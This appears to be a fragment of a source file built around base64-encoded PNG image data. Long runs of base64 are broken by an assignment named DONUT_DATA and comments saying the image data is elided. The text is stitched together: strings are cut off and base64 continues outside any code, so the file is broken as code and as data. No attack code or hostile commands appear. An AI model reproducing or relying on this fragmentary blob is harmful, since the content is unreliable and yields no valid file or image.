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
AAElFTkSuQmCC'  # tail of a base64-encoded PNG byte string (binary image data elided)
DONUT_DATA = b'iVBORw0KGgoAAAANSUhEUgAAAfQAAACSCAYAAACzDDh5...'  # base64-encoded PNG image data (bulk of payload elided)
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